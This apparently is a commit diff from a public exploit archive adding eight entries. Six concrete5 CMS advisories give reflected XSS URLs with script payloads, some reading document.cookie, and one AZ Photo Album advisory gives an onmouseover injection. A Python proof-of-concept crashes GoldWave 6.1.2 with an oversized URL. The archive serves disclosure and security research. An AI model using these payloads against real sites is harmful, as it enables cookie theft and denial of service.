DB: 2015-06-15

8 new exploits

files.csv

@@ -33636,8 +33636,16 @@ id,file,description,date,author,platform,type,port
 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
 37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
+37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
 37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
+37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37278,platforms/php/webapps/37278.txt,"concrete5 index.php/tools/required/files/customize_search_columns searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37279,platforms/php/webapps/37279.txt,"concrete5 index.php/tools/required/files/search_results searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37280,platforms/php/webapps/37280.txt,"concrete5 index.php/tools/required/sitemap_search_selector Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0

platforms/php/webapps/37277.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+      
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+      
+1. Multiple cross-site scripting vulnerabilities
+      
+2. An arbitrary-file-upload vulnerability
+      
+3. A denial-of-service vulnerability
+      
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+      
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID="><script>alert(1);</script>&search=1

platforms/php/webapps/37278.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+       
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+       
+1. Multiple cross-site scripting vulnerabilities
+       
+2. An arbitrary-file-upload vulnerability
+       
+3. A denial-of-service vulnerability
+       
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+       
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="><script>alert(document.cookie);</script>

platforms/php/webapps/37279.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+        
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+        
+1. Multiple cross-site scripting vulnerabilities
+        
+2. An arbitrary-file-upload vulnerability
+        
+3. A denial-of-service vulnerability
+        
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+        
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="><script>alert(1);</script>

platforms/php/webapps/37280.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+         
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+         
+1. Multiple cross-site scripting vulnerabilities
+         
+2. An arbitrary-file-upload vulnerability
+         
+3. A denial-of-service vulnerability
+         
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+         
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="><script>alert(1);</script>

platforms/php/webapps/37281.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/53640/info
+          
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+          
+1. Multiple cross-site scripting vulnerabilities
+          
+2. An arbitrary-file-upload vulnerability
+          
+3. A denial-of-service vulnerability
+          
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+          
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID="><script>alert(document.cookie);</script>&searchInstance=file1337335625
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="><script>alert(document.cookie);</script>

platforms/php/webapps/37282.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/53640/info
+           
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+           
+1. Multiple cross-site scripting vulnerabilities
+           
+2. An arbitrary-file-upload vulnerability
+           
+3. A denial-of-service vulnerability
+           
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+           
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="><script>alert(document.cookie);</script>
+&fid=VALID_ID_OF_IAMGE

platforms/php/webapps/37283.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53641/info
+
+The AZ Photo Album is prone to a cross-site-scripting and an arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit these issues to steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks. 
+
+http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20
+
+http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest 

platforms/windows/dos/37268.py

@@ -0,0 +1,24 @@
+#!/usr/bin/python
+# Exploit Title: GoldWave 6.1.2 (URL) Local Crash Exploit
+# Date: 12-06-2015
+# Exploit Author: 0neb1n
+# Vendor Homepage: http://www.goldwave.com/
+# Software Link: http://goldwave.com/downloads/InstallGoldWave612.exe
+# Version: 6.1.2
+# Tested on: Windows 8.1 Home KR
+# Step 1 : Make poc.txt and copy "http://AAAAAAAA..."
+# Step 2 : run GoldWave 6.1.2 -> File -> Open URl -> Paste "http://AAAAAA..."
+# step 3 : Boom!!
+
+file = "poc.txt"
+
+data = 'http://' + '\x41' * 200000
+
+fd = open(file, 'w')
+fd.write(data)
+fd.close()
+
+print ""
+print "[*] File successfully created !!"
+print "[*] Author : 0neb1n"
+print "[*] Mail : barcodecrow(at)gmail(dot)com"